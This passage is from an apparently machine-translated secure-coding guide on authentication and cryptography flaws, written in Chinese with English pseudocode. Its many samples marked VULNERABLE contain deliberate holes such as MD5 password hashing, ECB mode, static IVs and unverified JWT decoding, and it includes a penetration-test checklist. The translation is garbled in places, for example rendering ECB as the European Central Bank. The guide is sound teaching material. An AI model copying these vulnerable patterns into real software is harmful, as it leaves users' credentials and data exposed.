        sameSite: "Strict",
        path: "/auth/refresh",
        maxAge: 0
    })

// SECURE: SameSite considerations for cross-origin needs
function setCookieForOAuth(response, stateToken):
    // OAuth requires cookies to work across redirects
    // Use Lax instead of Strict when necessary
    response.setCookie("oauth_state", stateToken, {
        httpOnly: true,
        secure: true,
        sameSite: "Lax",      // Allows top-level navigation
        path: "/auth/callback",
        maxAge: 10 * 60       // 10 minutes for OAuth flow
    })

为什么说它是安全的：

HttpOnly 可以防止 XSS 窃取令牌。
安全标志确保仅使用 HTTPS 传输
SameSite 可防止 CSRF 攻击
路径限制规定了哪些请求包含 Cookie
较短的最大年龄限制暴露窗口
正确的域名范围可以防止子域名攻击

优秀示例 5：令牌刷新模式

// SECURE: Complete token refresh implementation
class AuthenticationService:

    ACCESS_TOKEN_DURATION = 15 * 60          // 15 minutes
    REFRESH_TOKEN_DURATION = 7 * 24 * 60 * 60  // 7 days
    REFRESH_TOKEN_REUSE_WINDOW = 60           // 1 minute grace period

    function login(email, password):
        user = validateCredentials(email, password)
        if not user:
            return { error: "Invalid credentials" }

        // Create session for tracking
        session = createSession(user.id)

        // Generate token pair
        accessToken = createAccessToken(user)
        refreshToken = createRefreshToken(user, session.id)

        return {
            accessToken: accessToken,
            refreshToken: refreshToken,
            expiresIn: ACCESS_TOKEN_DURATION
        }

    function refresh(refreshToken):
        // Validate refresh token
        decoded = verifyRefreshToken(refreshToken)
        if not decoded.valid:
            return { error: decoded.error }

        // Check token in database
        tokenRecord = getRefreshTokenRecord(decoded.jti)

        if not tokenRecord:
            // Token doesn't exist - possible theft, invalidate session
            invalidateSessionTokens(decoded.sid)
            return { error: "Invalid refresh token" }

        if tokenRecord.revoked:
            // Reuse of revoked token - likely theft
            // Revoke ALL tokens for this session
            invalidateSessionTokens(decoded.sid)
            logSecurityEvent("Refresh token reuse detected", decoded.sub)
            return { error: "Security violation detected" }

        if tokenRecord.usedAt:
            // Token was already used - check if within grace period
            if now() - tokenRecord.usedAt > REFRESH_TOKEN_REUSE_WINDOW:
                // Outside grace period - potential theft
                invalidateSessionTokens(decoded.sid)
                return { error: "Refresh token already used" }
            // Within grace period - return same tokens (replay protection)
            return tokenRecord.lastIssuedTokens

        // Mark token as used
        tokenRecord.usedAt = now()
        tokenRecord.save()

        // Generate new token pair (rotation)
        user = findUserById(decoded.sub)
        newAccessToken = createAccessToken(user)
        newRefreshToken = createRefreshToken(user, decoded.sid)

        // Store new tokens for replay protection
        tokenRecord.lastIssuedTokens = {
            accessToken: newAccessToken,
            refreshToken: newRefreshToken
        }
        tokenRecord.save()

        // Revoke old refresh token (after grace period, it's invalid)
        scheduleTokenRevocation(decoded.jti, REFRESH_TOKEN_REUSE_WINDOW)

        return {
            accessToken: newAccessToken,
            refreshToken: newRefreshToken,
            expiresIn: ACCESS_TOKEN_DURATION
        }

    function logout(accessToken, refreshToken):
        // Revoke access token (add to blacklist until expiry)
        decoded = decodeToken(accessToken)
        if decoded:
            blacklistToken(decoded.jti, decoded.exp)

        // Revoke refresh token immediately
        refreshDecoded = decodeToken(refreshToken)
        if refreshDecoded:
            revokeRefreshToken(refreshDecoded.jti)

        // Optionally invalidate entire session
        if refreshDecoded and refreshDecoded.sid:
            invalidateSession(refreshDecoded.sid)

        return { success: true }

    function logoutAll(userId):
        // Invalidate all sessions for user (password change, security concern)
        sessions = getSessionsForUser(userId)
        for session in sessions:
            invalidateSessionTokens(session.id)
            deleteSession(session.id)

        return { success: true, sessionsInvalidated: length(sessions) }

为什么说它是安全的：

刷新令牌轮换限制了重复攻击
令牌重用检测可识别潜在的盗窃行为
宽限期可防止合法的并发请求问题。
完全注销会使服务器端令牌失效。
会话绑定允许“从所有设备注销”。

优秀示例 6：正确的注销（令牌失效）

// SECURE: Complete logout implementation
function logout(request):
    // Get current session/tokens
    accessToken = request.cookies.access_token
    refreshToken = request.cookies.refresh_token
    sessionId = request.session.id

    // Revoke access token (add to blacklist)
    if accessToken:
        decoded = decodeToken(accessToken)
        if decoded:
            // Add to Redis/cache blacklist with TTL matching token expiry
            blacklistToken(decoded.jti, decoded.exp - now())

    // Revoke refresh token in database
    if refreshToken:
        refreshDecoded = decodeToken(refreshToken)
        if refreshDecoded:
            markRefreshTokenRevoked(refreshDecoded.jti)

    // Delete server-side session
    if sessionId:
        sessionStore.delete(sessionId)

    // Clear client cookies
    response = new Response()
    clearAuthCookies(response)

    return response.redirect("/login")

// SECURE: Token blacklist with automatic expiry
class TokenBlacklist:
    // Use Redis or similar with TTL support

    function add(tokenId, ttlSeconds):
        redis.setex("blacklist:" + tokenId, ttlSeconds, "revoked")

    function isBlacklisted(tokenId):
        return redis.exists("blacklist:" + tokenId)

// SECURE: Middleware to check token validity
function authMiddleware(request, next):
    accessToken = request.cookies.access_token

    if not accessToken:
        return redirect("/login")

    decoded = verifyAccessToken(accessToken)

    if not decoded.valid:
        return redirect("/login")

    // Check blacklist
    if tokenBlacklist.isBlacklisted(decoded.payload.jti):
        return redirect("/login")

    // Token is valid and not revoked
    request.user = decoded.payload
    return next(request)

// SECURE: Logout from all sessions
function logoutAllSessions(request):
    userId = request.user.sub

    // Get all active sessions for user
    sessions = sessionStore.findByUserId(userId)

    // Revoke all refresh tokens
    refreshTokens = getRefreshTokensForUser(userId)
    for token in refreshTokens:
        markRefreshTokenRevoked(token.jti)

    // Delete all sessions
    for session in sessions:
        sessionStore.delete(session.id)

    // Add all user's recent access tokens to blacklist
    // This requires tracking issued tokens or using short expiry
    invalidateAllAccessTokensForUser(userId)

    return success("Logged out from all devices")

为什么说它是安全的：

服务器端撤销操作会使注销立即生效。
黑名单可防止已撤销代币继续使用。
自动 TTL 清理功能可防止黑名单膨胀。
“从所有设备注销”功能可防止会话泄露
清除 Cookie 会移除客户端引用

边缘案例部分

极端情况 1：身份验证中的竞态条件

// VULNERABLE: Race condition in login attempts
function login(email, password):
    user = findUserByEmail(email)
    failedAttempts = getFailedAttempts(email)

    if failedAttempts >= MAX_ATTEMPTS:
        return error("Account locked")

    // Race condition: two requests check simultaneously,
    // both see failedAttempts = 4, both proceed
    if not verifyPassword(password, user.hashedPassword):
        incrementFailedAttempts(email)  // Not atomic!
        return error("Invalid credentials")

    resetFailedAttempts(email)
    return success()

// SECURE: Atomic rate limiting
function loginWithAtomicRateLimit(email, password):
    // Atomic increment and check in single operation
    result = redis.eval(`
        local attempts = redis.call('INCR', KEYS[1])
        if attempts == 1 then
            redis.call('EXPIRE', KEYS[1], 900)  -- 15 minute window
        end
        return attempts
    `, ["login_attempts:" + email])

    if result > MAX_ATTEMPTS:
        return error("Too many attempts. Try again later.")

    user = findUserByEmail(email)
    if not user or not verifyPassword(password, user.hashedPassword):
        return error("Invalid credentials")

    // Reset on success
    redis.del("login_attempts:" + email)
    return success()

// VULNERABLE: Race condition in concurrent session check
function login(email, password, request):
    user = authenticate(email, password)

    activeSessions = countActiveSessions(user.id)
    if activeSessions >= MAX_SESSIONS:
        return error("Too many active sessions")

    // Race: two logins pass the check simultaneously
    createSession(user.id)  // Now user has MAX_SESSIONS + 1
    return success()

// SECURE: Use database constraints or atomic operations
function loginWithSessionLimit(email, password, request):
    user = authenticate(email, password)

    // Use transaction with row lock
    transaction.start()
    try:
        activeSessions = countActiveSessionsForUpdate(user.id)  // SELECT FOR UPDATE
        if activeSessions >= MAX_SESSIONS:
            transaction.rollback()
            return error("Too many sessions")

        createSession(user.id)
        transaction.commit()
        return success()
    catch:
        transaction.rollback()
        throw

极端情况 2：针对密码比较的计时攻击

// VULNERABLE: Early return reveals password length information
function verifyPassword_vulnerable(input, stored):
    if length(input) != length(stored):
        return false  // Fast return reveals length mismatch

    for i in range(length(input)):
        if input[i] != stored[i]:
            return false  // Fast return reveals first different character

    return true

// VULNERABLE: String comparison has timing differences
function checkPassword_vulnerable(password, hash):
    computedHash = sha256(password)
    return computedHash == hash  // == operator may short-circuit

// SECURE: Constant-time comparison
function constantTimeEquals(a, b):
    if length(a) != length(b):
        // Still need length check, but make it constant-time
        b = b + repeat("\0", max(0, length(a) - length(b)))
        a = a + repeat("\0", max(0, length(b) - length(a)))

    result = 0
    for i in range(length(a)):
        result = result | (charCode(a[i]) ^ charCode(b[i]))

    return result == 0

// SECURE: Use library-provided constant-time comparison
function verifyPassword_secure(password, hashedPassword):
    // bcrypt.compare is designed to be constant-time
    return bcrypt.compare(password, hashedPassword)

// SECURE: Use crypto library's timingSafeEqual
function verifyHash(input, expected):
    inputHash = sha256(input)
    return crypto.timingSafeEqual(
        Buffer.from(inputHash, 'hex'),
        Buffer.from(expected, 'hex')
    )

极端情况 3：密码重置令牌问题

// VULNERABLE: Predictable reset token
function createResetToken_vulnerable(userId):
    token = md5(toString(userId) + toString(now()))
    expiry = now() + (60 * 60)  // 1 hour
    saveResetToken(userId, token, expiry)
    return token

// VULNERABLE: Token doesn't expire on use
function resetPassword_vulnerable(token, newPassword):
    resetRecord = getResetToken(token)
    if resetRecord and resetRecord.expiry > now():
        user = findUserById(resetRecord.userId)
        user.hashedPassword = hashPassword(newPassword)
        user.save()
        // Token not invalidated! Can be reused
        return success()
    return error("Invalid token")

// VULNERABLE: Token not invalidated on password change
function changePassword(userId, oldPassword, newPassword):
    user = findUserById(userId)
    if verifyPassword(oldPassword, user.hashedPassword):
        user.hashedPassword = hashPassword(newPassword)
        user.save()
        // Existing reset tokens still valid!
        return success()
    return error("Wrong password")

// SECURE: Complete password reset implementation
function createResetToken_secure(userId):
    // Generate cryptographically random token
    token = generateSecureRandom(32)  // 256 bits
    tokenHash = sha256(token)  // Store hash, not token
    expiry = now() + (15 * 60)  // 15 minutes

    // Invalidate any existing reset tokens
    deleteResetTokensForUser(userId)

    // Store hashed token
    saveResetToken(userId, tokenHash, expiry)

    // Return plaintext token for email (store hash only)
    return token

function resetPassword_secure(token, newPassword):
    tokenHash = sha256(token)
    resetRecord = getResetTokenByHash(tokenHash)

    if not resetRecord:
        return error("Invalid token")

    if resetRecord.expiry < now():
        deleteResetToken(tokenHash)
        return error("Token expired")

    if resetRecord.used:
        return error("Token already used")

    // Validate new password strength
    validation = validatePasswordStrength(newPassword)
    if not validation.valid:
        return error(validation.errors)

    user = findUserById(resetRecord.userId)

    // Update password
    user.hashedPassword = hashPassword(newPassword)
    user.passwordChangedAt = now()
    user.save()

    // Mark token as used (or delete)
    resetRecord.used = true
    resetRecord.save()

    // Invalidate all existing sessions
    invalidateAllSessionsForUser(user.id)

    // Invalidate all refresh tokens
    revokeAllRefreshTokensForUser(user.id)

    // Send notification email
    sendPasswordChangedNotification(user.email)

    return success()

极端情况 4：OAuth 状态参数问题

// VULNERABLE: No state parameter - CSRF possible
function initiateOAuth_vulnerable():
    redirectUrl = OAUTH_PROVIDER_URL +
        "?client_id=" + CLIENT_ID +
        "&redirect_uri=" + CALLBACK_URL +
        "&scope=email profile"
    return redirect(redirectUrl)

// VULNERABLE: Predictable state
function initiateOAuth_weakState():
    state = toString(now())  // Predictable!
    storeState(state)
    redirectUrl = OAUTH_PROVIDER_URL +
        "?client_id=" + CLIENT_ID +
        "&state=" + state +
        "&redirect_uri=" + CALLBACK_URL
    return redirect(redirectUrl)

// VULNERABLE: State not validated on callback
function handleCallback_vulnerable(request):
    code = request.query.code
    // state parameter ignored!
    tokens = exchangeCodeForTokens(code)
    return loginWithTokens(tokens)

// VULNERABLE: State reuse possible
function handleCallback_reuseVulnerable(request):
    code = request.query.code
    state = request.query.state

    if isValidState(state):  // Just checks if it exists
        // Doesn't delete/invalidate state after use
        tokens = exchangeCodeForTokens(code)
        return loginWithTokens(tokens)

    return error("Invalid state")

// SECURE: Complete OAuth implementation
function initiateOAuth_secure(request):
    // Generate random state
    state = generateSecureRandom(32)

    // Bind state to user's session (CSRF protection)
    request.session.oauthState = state
    request.session.oauthStateCreatedAt = now()

    // Optional: include nonce for ID token validation
    nonce = generateSecureRandom(32)
    request.session.oauthNonce = nonce

    redirectUrl = OAUTH_PROVIDER_URL +
        "?client_id=" + CLIENT_ID +
        "&response_type=code" +
        "&redirect_uri=" + encodeURIComponent(CALLBACK_URL) +
        "&scope=" + encodeURIComponent("openid email profile") +
        "&state=" + state +
        "&nonce=" + nonce

    return redirect(redirectUrl)

function handleCallback_secure(request):
    code = request.query.code
    state = request.query.state
    error = request.query.error

    // Check for OAuth error
    if error:
        logOAuthError(error, request.query.error_description)
        return redirect("/login?error=oauth_failed")

    // Validate state
    if not state:
        return error("Missing state parameter")

    storedState = request.session.oauthState
    stateCreatedAt = request.session.oauthStateCreatedAt

    // Constant-time comparison
    if not constantTimeEquals(state, storedState):
        logSecurityEvent("OAuth state mismatch", request)
        return error("Invalid state")

    // Check state expiry (5 minutes)
    if now() - stateCreatedAt > 300:
        return error("OAuth session expired")

    // Clear state immediately (one-time use)
    delete request.session.oauthState
    delete request.session.oauthStateCreatedAt

    // Exchange code for tokens
    tokenResponse = await exchangeCodeForTokens(code, CALLBACK_URL)

    if not tokenResponse.id_token:
        return error("Missing ID token")

    // Validate ID token
    idToken = verifyIdToken(tokenResponse.id_token, {
        audience: CLIENT_ID,
        nonce: request.session.oauthNonce  // Verify nonce
    })

    delete request.session.oauthNonce

    if not idToken.valid:
        return error("Invalid ID token")

    // Create or update user
    user = findOrCreateUserFromOAuth(idToken.payload)

    // Create session with new session ID
    createAuthenticatedSession(request, user)

    return redirect("/dashboard")

常见错误部分

常见错误1：未经验证就从令牌有效载荷中检查用户ID

// VULNERABLE: Trusting unverified token payload
function getUserFromToken_vulnerable(token):
    // Decodes token WITHOUT verification
    decoded = base64Decode(token.split(".")[1])
    payload = JSON.parse(decoded)

    // Trusting the user ID from unverified payload!
    return findUserById(payload.sub)

// VULNERABLE: Verifying signature but using wrong data source
function getUser_vulnerable(request):
    token = request.headers.authorization.replace("Bearer ", "")

    // Verify the token (good)
    isValid = jwt.verify(token, secret)

    if isValid:
        // But then extract user from request body (bad!)
        userId = request.body.userId
        return findUserById(userId)

// SECURE: Always use verified payload
function getUserFromToken_secure(token):
    try:
        // Verify and decode in one operation
        decoded = jwt.verify(token, secret, { algorithms: ["HS256"] })

        // Use the verified payload, not a separate data source
        return findUserById(decoded.sub)
    catch:
        return null

// SECURE: Middleware that sets verified user
function authMiddleware(request, next):
    token = extractTokenFromRequest(request)

    if not token:
        return unauthorized()

    try:
        verified = jwt.verify(token, secret, {
            algorithms: ["HS256"],
            issuer: "myapp"
        })

        // Set user from VERIFIED token only
        request.user = {
            id: verified.sub,
            email: verified.email,
            role: verified.role
        }

        return next()
    catch:
        return unauthorized()

常见错误二：未使旧会话失效

// VULNERABLE: Password change doesn't invalidate sessions
function changePassword_vulnerable(request, oldPassword, newPassword):
    user = request.user

    if verifyPassword(oldPassword, user.hashedPassword):
        user.hashedPassword = hashPassword(newPassword)
        user.save()
        return success("Password changed")

    return error("Wrong password")
    // Existing sessions remain valid! Attacker still logged in

// VULNERABLE: Role change doesn't update session
function demoteUser_vulnerable(userId):
    user = findUserById(userId)
    user.role = "basic"
    user.save()
    // User's existing sessions still have old role!
    return success()

// SECURE: Invalidate sessions on security-sensitive changes
function changePassword_secure(request, oldPassword, newPassword):
    user = request.user

    if not verifyPassword(oldPassword, user.hashedPassword):
        return error("Wrong password")

    // Update password
    user.hashedPassword = hashPassword(newPassword)
    user.passwordChangedAt = now()
    user.save()

    // Invalidate ALL sessions except current (or including current)
    currentSessionId = request.session.id
    sessions = getAllSessionsForUser(user.id)

    for session in sessions:
        if session.id != currentSessionId:  // Keep current or invalidate all
            deleteSession(session.id)

    // Revoke all refresh tokens
    revokeAllRefreshTokensForUser(user.id)

    // Optional: Force re-authentication
    regenerateSession(request)

    return success("Password changed. Other sessions logged out.")

// SECURE: Track password change timestamp in tokens
function validateToken_withPasswordCheck(token):
    decoded = jwt.verify(token, secret)

    user = findUserById(decoded.sub)

    // Check if token was issued before password change
    if decoded.iat < user.passwordChangedAt:
        return { valid: false, error: "Password changed since token issued" }

    return { valid: true, payload: decoded }

常见错误 3：对 SameSite Cookie 的误解

// VULNERABLE: Using Lax when Strict is needed
function setSessionCookie_wrongSameSite(response, sessionId):
    response.setCookie("session_id", sessionId, {
        httpOnly: true,
        secure: true,
        sameSite: "Lax"  // Allows cookie on top-level navigation
        // Attacker can CSRF via: <a href="https://bank.com/transfer?to=attacker">
    })

// VULNERABLE: Omitting SameSite (defaults vary by browser)
function setSessionCookie_noSameSite(response, sessionId):
    response.setCookie("session_id", sessionId, {
        httpOnly: true,
        secure: true
        // SameSite not specified - browser-dependent behavior
    })

// VULNERABLE: Using None without understanding implications
function setSessionCookie_sameNone(response, sessionId):
    response.setCookie("session_id", sessionId, {
        httpOnly: true,
        secure: true,
        sameSite: "None"  // Sent on ALL cross-site requests - CSRF vulnerable!
    })

// GUIDE: When to use each SameSite value

// STRICT: Most secure, use for sensitive auth cookies
// - Cookie NOT sent on any cross-site request
// - User clicking link from email to your site won't be logged in
// - Best for: Banking, admin panels, security-critical apps
function setStrictCookie(response, sessionId):
    response.setCookie("session_id", sessionId, {
        httpOnly: true,
        secure: true,
        sameSite: "Strict"
    })

// LAX: Balance of security and usability
// - Cookie sent on top-level navigation (clicking links)
// - NOT sent on cross-site POST, images, iframes
// - Good for: General user sessions where link-sharing matters
// - STILL NEED CSRF tokens for POST/PUT/DELETE endpoints!
function setLaxCookie(response, sessionId):
    response.setCookie("session_id", sessionId, {
        httpOnly: true,
        secure: true,
        sameSite: "Lax"
    })
    // Additional CSRF protection still recommended

// NONE: Only for cross-site embedding needs
// - Cookie sent on ALL requests including cross-site
// - REQUIRES Secure attribute (HTTPS only)
// - Only use for: OAuth flows, embedded widgets, intentional cross-site
function setNoneCookie_onlyWhenNeeded(response, oauthToken):
    response.setCookie("oauth_continuation", oauthToken, {
        httpOnly: true,
        secure: true,          // REQUIRED with SameSite=None
        sameSite: "None",
        maxAge: 300            // Short-lived for specific purpose
    })

安全标头配置

// SECURE: Complete security headers for authentication
function setSecurityHeaders(response):
    // Prevent clickjacking (don't allow embedding in frames)
    response.setHeader("X-Frame-Options", "DENY")

    // Modern clickjacking protection
    response.setHeader("Content-Security-Policy",
        "default-src 'self'; " +
        "script-src 'self'; " +
        "style-src 'self' 'unsafe-inline'; " +
        "frame-ancestors 'none'; " +
        "form-action 'self'"
    )

    // Prevent MIME type sniffing
    response.setHeader("X-Content-Type-Options", "nosniff")

    // Enable browser XSS filter (legacy, CSP is better)
    response.setHeader("X-XSS-Protection", "1; mode=block")

    // Only allow HTTPS
    response.setHeader("Strict-Transport-Security",
        "max-age=31536000; includeSubDomains; preload"
    )

    // Control referrer information
    response.setHeader("Referrer-Policy", "strict-origin-when-cross-origin")

    // Disable feature policies for sensitive features
    response.setHeader("Permissions-Policy",
        "geolocation=(), camera=(), microphone=(), payment=()"
    )

    // Cache control for authenticated pages
    response.setHeader("Cache-Control",
        "no-store, no-cache, must-revalidate, private"
    )
    response.setHeader("Pragma", "no-cache")
    response.setHeader("Expires", "0")

// SECURE: Login page specific headers
function setLoginPageHeaders(response):
    setSecurityHeaders(response)

    // Additional login protection
    response.setHeader("Content-Security-Policy",
        "default-src 'self'; " +
        "script-src 'self'; " +
        "style-src 'self'; " +
        "form-action 'self'; " +        // Forms only submit to same origin
        "frame-ancestors 'none'; " +     // Prevent clickjacking
        "base-uri 'self'"               // Prevent base tag injection
    )

// SECURE: API endpoint headers
function setApiHeaders(response):
    // API responses shouldn't be cached
    response.setHeader("Cache-Control", "no-store")

    // Prevent embedding
    response.setHeader("X-Content-Type-Options", "nosniff")

    // CORS configuration (adjust based on needs)
    response.setHeader("Access-Control-Allow-Origin",
        getAllowedOrigin())  // Not "*" for authenticated APIs!
    response.setHeader("Access-Control-Allow-Credentials", "true")
    response.setHeader("Access-Control-Allow-Methods",
        "GET, POST, PUT, DELETE, OPTIONS")
    response.setHeader("Access-Control-Allow-Headers",
        "Content-Type, Authorization")

检测提示：如何发现身份验证问题

代码审查模式

// RED FLAGS in authentication code:

// 1. Missing algorithm specification in JWT verification
jwt.verify(token, secret)  // BAD - should specify algorithms
jwt.decode(token)          // BAD - decode doesn't verify!

// 2. Session not regenerated after login
request.session.userId = user.id  // Search for: session assignment without regenerate

// 3. Tokens in localStorage
localStorage.setItem("token"  // Search for: localStorage.*token

// 4. No HttpOnly on session cookies
setCookie("session", id)  // Search for: setCookie without httpOnly

// 5. Weak secrets
JWT_SECRET = "secret"     // Search for: SECRET.*=.*["']

// 6. No expiration
jwt.sign(payload, secret)  // Without expiresIn

// 7. Password comparison without constant-time
if password == storedHash  // Direct comparison

// 8. No rate limiting on login
function login(email, password)  // Check for rate limit before auth logic

// GREP patterns for security review:
// localStorage\.setItem.*token
// sessionStorage\.setItem.*token
// jwt\.decode\s*\(
// jwt\.verify\s*\([^,]+,[^,]+\s*\)  (missing options)
// sameSite.*None
// password.*==
// \.secret\s*=\s*["']

安全测试清单

// Authentication security test cases:

// 1. Token manipulation tests
- [ ] Change JWT algorithm to "none" and remove signature
- [ ] Modify JWT payload (role, user ID) and check if accepted
- [ ] Use expired token
- [ ] Use token with wrong issuer/audience

// 2. Session tests
- [ ] Check if session ID changes after login
- [ ] Attempt session fixation (set session ID before login)
- [ ] Check session timeout enforcement
- [ ] Verify logout actually invalidates session

// 3. Password tests
- [ ] Test common passwords (password123, qwerty, etc.)
- [ ] Test password length limits (very long passwords)
- [ ] Check password reset token predictability
- [ ] Verify password reset invalidates old tokens

// 4. Cookie tests
- [ ] Check HttpOnly flag on session cookies
- [ ] Check Secure flag on session cookies
- [ ] Test SameSite enforcement
- [ ] Verify cookie scope (path, domain)

// 5. Rate limiting tests
- [ ] Attempt rapid login failures
- [ ] Check for account lockout
- [ ] Test rate limit bypass (different IPs, headers)

// 6. OAuth tests
- [ ] Test with missing state parameter
- [ ] Test with reused state parameter
- [ ] Check redirect_uri validation

安全检查清单

密码已根据常用密码列表和泄露数据库进行验证
密码哈希使用 bcrypt、argon2 或 scrypt 算法，并采用适当的工作因子。
使用加密安全的随机数生成的会话 ID
身份验证和权限更改后会话重新生成
JWT算法已明确指定（并非从令牌推导而来）
JWT“无”算法明确拒绝
JWT密钥强度高（256位以上），且存储安全。
JWT（访问令牌）的有效期很短（15-30分钟）。
刷新令牌轮换已实现
令牌可以在服务器端撤销（黑名单或会话绑定）
身份验证 cookie 具有 HttpOnly、Secure 和相应的 SameSite 属性。
令牌存储在 HttpOnly cookie 中，而不是 localStorage/sessionStorage 中。
在登录端点实施速率限制
多次失败后账户被锁定
用于密码/令牌验证的恒定时间比较
密码重置令牌是经过加密随机生成的，并且是一次性使用的。
更改密码会使现有会话失效
OAuth状态参数是随机生成的，并且经过验证。
已配置安全标头（HSTS、CSP、X-Frame-Options 等）
注销操作会使服务器端会话/令牌失效。
“从所有设备注销”功能可用

模式 5：加密故障

CWE 参考： CWE-327（使用已损坏或存在风险的加密算法）、CWE-328（可逆单向哈希）、CWE-329（CBC 模式下未使用随机初始化向量）、CWE-330（使用随机性不足的值）、CWE-331（熵不足）、CWE-338（使用加密强度较弱的伪随机数生成器）、CWE-916（使用计算量不足的密码哈希）

优先级评分： 18-20（频率：7，严重性：9，可检测性：4-6）

引言：密码学很难——人工智能常常复制过时的模式

加密实现是安全敏感代码中最危险的领域之一。由于多种因素的叠加，人工智能模型尤其容易生成不安全的加密模式：

为什么人工智能模型会生成弱加密：

训练数据存在时间滞后：加密最佳实践不断发展演进。训练数据包含多年过时的教程、Stack Overflow 上的答案以及推荐已被认为失效的算法（例如 MD5、SHA1、DES、RC4）的文档。人工智能模型无法区分“2015 年有效”和“2025 年安全”。
教程简化：教育材料通常使用简化的加密示例来讲解概念——例如，使用 MD5 进行演示，使用短密钥以提高可读性，使用静态初始化向量 (IV) 以提高可复现性。人工智能会将这些“教学模式”学习为有效的实现方式。
复制粘贴现象普遍存在：加密代码经常被复制而非理解。训练数据也反映了这一点——相同的不安全模式在不同的存储库中出现了数千次，从而强化了错误的方法。
API 复杂性隐藏着危险：现代加密库的 API 非常复杂，其默认参数可能存在安全隐患。人工智能生成的代码虽然“运行正常”，但却使用默认设置，而没有意识到这些默认设置可能缺乏身份验证（例如 ECB 模式）或使用了弱密钥派生方法。
安全性与便捷性之间的权衡：人工智能模型优化的是代码的编译和运行。加密安全通常需要额外的步骤（例如正确的初始化向量生成、认证模式、密钥派生），而人工智能为了简化操作会省略这些步骤。
跨语言混淆：不同语言的加密 API 差异巨大。人工智能会将来自不同生态系统的模式混淆，生成混合代码，这些代码可能可以编译，但却违反了两个库的安全假设。

影响统计数据：

29%的数据泄露事件涉及加密故障（Verizon DBIR 2024）
2021 年 OWASP Top 10安全漏洞排行榜前两名（“密码学故障”）
62%的 AI 生成的代码样本使用 MD5 或 SHA1 进行密码哈希处理（2024 年安全研究）
因加密薄弱导致的数据泄露成本：平均480 万美元（IBM 2024 年数据泄露成本报告）
40%的应用程序仍在生产环境中使用存在缺陷的加密算法（Veracode 软件安全状况报告）

反例：多种表现形式

错误示例 1：使用 MD5/SHA1 进行密码哈希

// VULNERABLE: MD5 for password hashing
function hashPassword(password):
    return md5(password)

// VULNERABLE: SHA1 for password storage
function storePassword(userId, password):
    hashedPassword = sha1(password)
    database.update("users", userId, {"password": hashedPassword})

// VULNERABLE: Single-round SHA256 (still too fast)
function createPasswordHash(password):
    return sha256(password)

// VULNERABLE: Unsalted hash
function verifyPassword(inputPassword, storedHash):
    return sha256(inputPassword) == storedHash

// VULNERABLE: Simple salt without proper KDF
function hashWithSalt(password, salt):
    return sha256(salt + password)

// VULNERABLE: MD5 with salt (still MD5)
function improvedHash(password):
    salt = generateRandomBytes(16)
    hash = md5(salt + password)
    return salt + ":" + hash

为什么这样做很危险：

在现代硬件上，MD5 可以在几秒钟内产生碰撞结果。
SHA1碰撞攻击是切实可行的（SHAttered攻击，2017）
即使是 SHA256 算法对于密码哈希来说速度也太快了——在 GPU 上每秒可以进行数十亿次哈希运算。
无盐哈希值容易受到彩虹表攻击
简单的字符串拼接（盐值 + 密码）无法提供足够的保护。
密码破解设备每秒可测试 1800 亿个 MD5 哈希值。

攻击场景：

// Attacker steals database with MD5 password hashes
// Using hashcat on modern GPU:

hashcat_speed = 180_000_000_000  // 180 billion MD5/second
common_passwords = 1_000_000_000  // 1 billion common passwords

time_to_crack_all = common_passwords / hashcat_speed
// Result: ~5.5 seconds to check ALL common passwords against ALL hashes

// Even SHA256 is fast:
sha256_speed = 23_000_000_000  // 23 billion SHA256/second
// Still under a minute for billion password list

错误示例 2：ECB 模式加密

// VULNERABLE: ECB mode reveals patterns
function encryptData(plaintext, key):
    cipher = createCipher("AES", key, mode = "ECB")
    return cipher.encrypt(plaintext)

// VULNERABLE: Default mode may be ECB in some libraries
function simpleEncrypt(data, key):
    cipher = AES.new(key)  // Some libraries default to ECB!
    return cipher.encrypt(padData(data))

// VULNERABLE: Explicit ECB for "simplicity"
function encryptUserData(userData, encryptionKey):
    algorithm = "AES/ECB/PKCS5Padding"  // Java-style
    cipher = Cipher.getInstance(algorithm)
    cipher.init(ENCRYPT_MODE, encryptionKey)
    return cipher.doFinal(userData)

// VULNERABLE: Assuming any AES is secure
function protectSensitiveData(data, key):
    // "AES is strong encryption" - but ECB mode is not
    encryptor = AESEncryptor(key, mode = "ECB")
    return encryptor.encrypt(data)

为什么这样做很危险：

欧洲央行将相同的明文块加密成相同的密文块
明文中的模式在密文中得以保留。
著名例子：欧洲央行加密的图像会显示原始图像轮廓
语义安全性缺失——攻击者能够获取有关明文结构的信息
可能存在区块操纵攻击（交换、删除、复制区块）

视觉演示：

// Original image (bitmap of a penguin):
// ████████████████
// ██    ████    ██
// ██  ██████  ██
// ██████████████
// ████    ████████
// ████████████████

// After ECB encryption:
// ????????????????   ← Still shows penguin shape!
// ??    ????    ??   ← Identical colors → identical ciphertext
// ??  ??????  ??
// ??????????????
// ????    ????????
// ????????????????

// After CBC/GCM encryption:
// ????????????????   ← Random appearance
// ????????????????   ← No pattern visible
// ????????????????
// ????????????????
// ????????????????
// ????????????????

反例 3：静态 IV / nonce

// VULNERABLE: Hardcoded IV
STATIC_IV = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])

function encryptMessage(plaintext, key):
    cipher = AES.new(key, AES.MODE_CBC, iv = STATIC_IV)
    return cipher.encrypt(padData(plaintext))

// VULNERABLE: Same IV for all encryptions
class Encryptor:
    IV = generateRandomBytes(16)  // Generated ONCE at startup

    function encrypt(data, key):
        cipher = createCipher("AES-CBC", key, this.IV)
        return cipher.encrypt(data)

// VULNERABLE: Predictable IV (counter without random start)
nonce_counter = 0
function encryptWithNonce(plaintext, key):
    nonce_counter = nonce_counter + 1
    nonce = intToBytes(nonce_counter, 12)  // Predictable!
    return AES_GCM_encrypt(key, nonce, plaintext)

// VULNERABLE: IV derived from predictable data
function encryptRecord(userId, data, key):
    iv = sha256(toString(userId))[:16]  // Same IV for same user!
    return AES_CBC_encrypt(key, iv, data)

// VULNERABLE: Timestamp-based IV
function timeBasedEncrypt(data, key):
    iv = sha256(toString(getCurrentTimestamp()))[:16]
    return AES_CBC_encrypt(key, iv, data)
    // Problem: Collisions if encrypted in same second

为什么这样做很危险：

相同的初始化向量 (IV) + 相同的密钥 = 相同的明文对应相同的密文（破坏语义安全性）
在 CBC 模式下：可通过对消息进行 XOR 分析来恢复明文。
在 CTR 模式下：密钥流重用 → 可恢复的明文 XOR 值
在 GCM 模式下：nonce 重用会造成灾难性后果——密钥恢复仍然可能
可预测的初始化向量使得选择明文攻击成为可能。

GCM随机数重用攻击：

// If same nonce used twice with same key in GCM:
// Message 1: plaintext1, ciphertext1, tag1
// Message 2: plaintext2, ciphertext2, tag2

// Attacker can compute:
// - XOR of plaintext1 and plaintext2
